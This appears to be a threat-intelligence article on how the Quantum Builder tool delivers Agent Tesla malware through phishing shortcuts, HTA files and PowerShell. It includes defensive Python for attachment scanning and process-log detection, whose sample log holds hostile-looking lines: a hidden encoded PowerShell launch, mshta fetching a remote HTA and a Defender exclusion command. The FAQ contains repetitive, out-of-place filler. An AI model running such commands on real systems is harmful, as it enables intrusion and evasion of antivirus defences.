Where data is home

Hackers Utilize Dark Web Quantum Builder For Agent Tesla Rat Malware

The usage of the malicious tool Quantum Builder, also known as Quantum Link Builder, by hackers to deploy the Agent Tesla Remote Access Trojan (RAT) malware has become a growing concern. The Lazarus Group APT, known for their advanced persistent threats, is associated with Quantum Builder due to shared tactics, techniques, and source code overlaps. This tool enables threat actors to create and distribute malicious payloads, including LNK, HTA, and PowerShell files, which are used to deliver the Agent Tesla malware. To evade detection, Quantum Builder employs various techniques such as bypassing User Account Control, configuring Windows Defender exclusions, utilizing LOLBins for multi-stage infection chains, executing PowerShell scripts in memory, and employing decoys as distraction tactics. The tool is readily available on the dark web for a monthly subscription fee and has witnessed a significant surge in usage in recent months. In targeted attacks against organizations, particularly in the recent Agent Tesla campaign, hackers have been exploiting the capabilities of Quantum Builder.

Key Takeaways

  • Quantum Builder is a malicious tool used by hackers to generate payloads and deliver the Agent Tesla malware.
  • Quantum Builder is available on the dark web for a monthly subscription fee of €189 and offers various options for creating malicious files and payloads.
  • The malware infection chain initiated by Quantum Builder involves phishing emails with GZIP or ZIP attachments containing shortcuts that execute PowerShell code to launch remote HTA and ultimately deliver Agent Tesla.
  • There has been a significant increase in the usage of Quantum Builder in recent months, with threat actors utilizing it to distribute various types of malware, including the Agent Tesla campaign.
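The infection chain in the takeaways starts with a GZIP or ZIP attachment carrying a shortcut. The following mail-gateway check is an added example, not code from the article or any vendor product: it unwraps GZIP and ZIP containers and flags shortcut (.lnk), HTA and PowerShell files, recognising a shortcut by its MS-SHLLINK header even when the extension has been renamed. The sample attachment it builds is constructed for the demonstration.

```python
import gzip
import io
import zipfile

# A Windows shell link begins with HeaderSize 0x4C followed by the
# LinkCLSID 00021401-0000-0000-C000-000000000046 (MS-SHLLINK spec).
LNK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")
SUSPECT_EXT = (".lnk", ".hta", ".ps1")


def looks_like_lnk(data: bytes) -> bool:
    """Magic-byte check, so a renamed shortcut is still caught."""
    return data[: len(LNK_MAGIC)] == LNK_MAGIC


def inspect_attachment(name: str, blob: bytes) -> list:
    """Return a list of findings (strings) for one e-mail attachment.

    Unwraps GZIP streams and ZIP archives (recursively, so a ZIP inside a
    GZIP is handled) and checks every leaf file by extension and by magic.
    """
    findings = []
    lname = name.lower()
    if lname.endswith(".gz") or blob[:2] == b"\x1f\x8b":
        try:
            inner = gzip.decompress(blob)
        except (OSError, EOFError):
            return [f"{name}: undecodable gzip stream"]
        inner_name = name[:-3] if lname.endswith(".gz") else name + ".inner"
        return inspect_attachment(inner_name, inner)
    if zipfile.is_zipfile(io.BytesIO(blob)):
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            for info in zf.infolist():
                findings += inspect_attachment(f"{name}/{info.filename}", zf.read(info))
        return findings
    if lname.endswith(SUSPECT_EXT):
        findings.append(f"{name}: script/shortcut file by extension")
    if looks_like_lnk(blob):
        findings.append(f"{name}: Windows shell link by magic bytes")
    return findings


def build_sample() -> bytes:
    """Constructed sample (not a real campaign file): a ZIP holding a decoy
    PDF and a shortcut renamed to .txt, the whole archive wrapped in GZIP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invoice.pdf", b"%PDF-1.4 decoy content")
        zf.writestr("Invoice.txt", LNK_MAGIC + b"\x00" * 60)
    return gzip.compress(buf.getvalue())


if __name__ == "__main__":
    print(inspect_attachment("Invoice.zip.gz", build_sample()))
```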

What is Quantum Builder?

Quantum Builder, also known as Quantum Link Builder, is a malicious shortcut file creation tool that has been linked with the Lazarus Group APT due to shared tactics, techniques, and procedures (TTPs) as well as source code overlaps. This tool has had a significant impact on the underground cybercrime ecosystem, as threat actors utilize it to generate malicious payloads such as LNK, HTA, and PowerShell. These payloads are then used to deliver the Agent Tesla malware in targeted attacks. To defend against Quantum Builder-based attacks, organizations can employ several mitigation strategies. These include implementing robust email security measures to prevent phishing attempts, regularly updating and patching software to address vulnerabilities, and educating employees about the dangers of opening suspicious attachments or clicking on unknown links. Additionally, organizations should employ robust endpoint protection solutions that can detect and block malicious activities associated with Quantum Builder.

Techniques used by Quantum Builder

The techniques employed by Quantum Builder involve bypassing User Account Control and configuring Windows Defender exclusions. By utilizing the Microsoft Connection Manager Profile Installer (CMSTP) binary, the software bypasses User Account Control to gain elevated privileges. This allows the malicious payloads generated by Quantum Builder to execute without alerting the user. Additionally, the tool configures Windows Defender exclusions to avoid detection by antivirus software. Quantum Builder also integrates attack vectors using LOLBins (Living Off the Land Binaries) for a multi-stage infection chain. This involves leveraging legitimate system binaries to carry out malicious activities, making it harder to detect and mitigate the attack. Furthermore, Quantum Builder executes PowerShell scripts in memory, evading detection by running malicious commands without writing them to disk. Lastly, the tool employs decoys as distraction tactics to divert attention away from the actual infection.

Increase in Quantum Builder usage

There has been a notable surge in the usage of Quantum Builder, which is increasingly adopted for distributing various types of malware, including in recent campaigns targeting organizations. This increase in usage has had a significant impact on the cybersecurity landscape. The tool’s ability to generate malicious payloads and evade detection through techniques such as bypassing User Account Control and executing PowerShell scripts in memory poses a serious threat to organizations. To mitigate the risks associated with Quantum Builder usage, organizations should implement strategies such as regularly updating security software, conducting employee training on phishing awareness, and implementing strong access controls. Additionally, organizations should monitor their networks for any signs of Quantum Builder activity and promptly respond to any potential threats.

Frequently Asked Questions

How does Quantum Builder bypass User Account Control with the Microsoft Connection Manager Profile Installer (CMSTP) binary?

Quantum Builder uses the Microsoft Connection Manager Profile Installer (CMSTP) binary to bypass User Account Control, giving its payloads elevated privileges and allowing unauthorized execution without alerting the user. Alongside this, the tool configures Windows Defender exclusions and utilizes LOLBins for its multi-stage infection chain, so countermeasures to detect and prevent Quantum Builder attacks need to account for these techniques as well.

Can Quantum Builder configure Windows Defender exclusions? If so, how does it do it?

Yes. As described in the techniques section, Quantum Builder configures Windows Defender exclusions so that its payloads avoid detection by antivirus software. Quantum Builder can also be used for other types of malware besides the Agent Tesla RAT. The potential risks and implications of hackers using Quantum Builder on the dark web include the widespread distribution of various malware and the ability to bypass security measures, leading to increased cyber threats.

What are LOLBins and how does Quantum Builder integrate them into the attack vectors?

LOLBins, or Living Off the Land Binaries, are legitimate system binaries that hackers misuse to carry out malicious activities. Quantum Builder integrates these LOLBins as attack vectors, leveraging their trusted nature to evade detection. To detect and prevent LOLBin attacks, strategies such as monitoring and analyzing LOLBin usage, implementing application whitelisting, and conducting regular security audits are crucial. The role of quantum computing in cybersecurity is not directly related to the detection and prevention of LOLBin attacks.

How does Quantum Builder execute PowerShell scripts in memory to evade detection?

Quantum Builder evades detection by executing PowerShell scripts in memory. This technique allows the malware to avoid leaving traces on disk, making it harder for security solutions to detect and mitigate the attack. To counter such memory-based attacks, techniques like behavioral analysis, anomaly detection, and memory protection mechanisms can be employed. Additionally, monitoring and analyzing PowerShell activity can help identify and block malicious scripts. The impact of quantum computing on cybersecurity is unrelated to this discussion.
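The techniques section and the two FAQ answers on LOLBins and in-memory PowerShell all point at the same detection work: watching process-creation telemetry for the behaviours the article names. The rule set below is an added example, not code from the article or any product. It assumes Sysmon-style process-creation events with the fields pid, image, parent and cmd (an assumption of this example), and the four sample events are constructed for the demonstration.

```python
import json
import re

# Each rule maps to one behaviour the article attributes to Quantum Builder
# builds. Field names (pid, image, parent, cmd) are assumed for this example.
RULES = {
    # CMSTP-based UAC bypass: cmstp.exe should not be spawning shells or scripts.
    "uac_bypass_cmstp": lambda e: e["parent"].lower().endswith("\\cmstp.exe"),
    # Defender tampering through the MpPreference cmdlets.
    "defender_exclusion": lambda e: re.search(
        r"(add|set)-mppreference\b.*-(exclusion\w*|disable\w+)", e["cmd"], re.I),
    # In-memory PowerShell: encoded/hidden launches and download-and-eval idioms.
    "powershell_in_memory": lambda e: e["image"].lower().endswith(
        ("\\powershell.exe", "\\pwsh.exe")) and re.search(
        r"-e(nc(odedcommand)?)?\s|\biex\b|invoke-expression|downloadstring"
        r"|-w(indowstyle)?\s+hidden", e["cmd"], re.I),
    # LOLBin stage: mshta.exe pulling an HTA from a remote URL.
    "remote_hta_lolbin": lambda e: e["image"].lower().endswith("\\mshta.exe")
        and re.search(r"https?://", e["cmd"], re.I),
}


def detect(log_text: str) -> dict:
    """Run every rule over newline-delimited JSON events; return rule -> [pid]."""
    hits = {name: [] for name in RULES}
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        for name, rule in RULES.items():
            if rule(event):
                hits[name].append(event["pid"])
    return hits


# Constructed sample events (not real telemetry); example.invalid is a reserved
# test domain and the base64 after -enc is a meaningless placeholder.
PS = "C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"
SAMPLE_LOG = f"""
{{"pid": 4120, "image": "{PS}", "parent": "C:\\\\Windows\\\\explorer.exe", "cmd": "powershell.exe -nop -w hidden -enc SQBFAFgA"}}
{{"pid": 4188, "image": "C:\\\\Windows\\\\System32\\\\mshta.exe", "parent": "{PS}", "cmd": "mshta.exe http://example.invalid/update.hta"}}
{{"pid": 4300, "image": "{PS}", "parent": "C:\\\\Windows\\\\System32\\\\cmstp.exe", "cmd": "powershell.exe -nop Add-MpPreference -ExclusionPath C:\\\\Users\\\\Public"}}
{{"pid": 5000, "image": "{PS}", "parent": "C:\\\\Windows\\\\System32\\\\svchost.exe", "cmd": "powershell.exe -File C:\\\\Scripts\\\\backup.ps1"}}
"""

if __name__ == "__main__":
    print(detect(SAMPLE_LOG))
```

The fourth event is a scheduled backup script and trips none of the rules, which is the false-positive check a practitioner would run before deploying such logic.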

What are the decoys used by Quantum Builder as distraction tactics after infection?

Decoy tactics employed by Quantum Builder serve as distraction measures following infection, aiming to divert attention from the malware’s presence. These tactics, part of Quantum Builder’s evasion techniques, are utilized to impede detection and analysis processes.
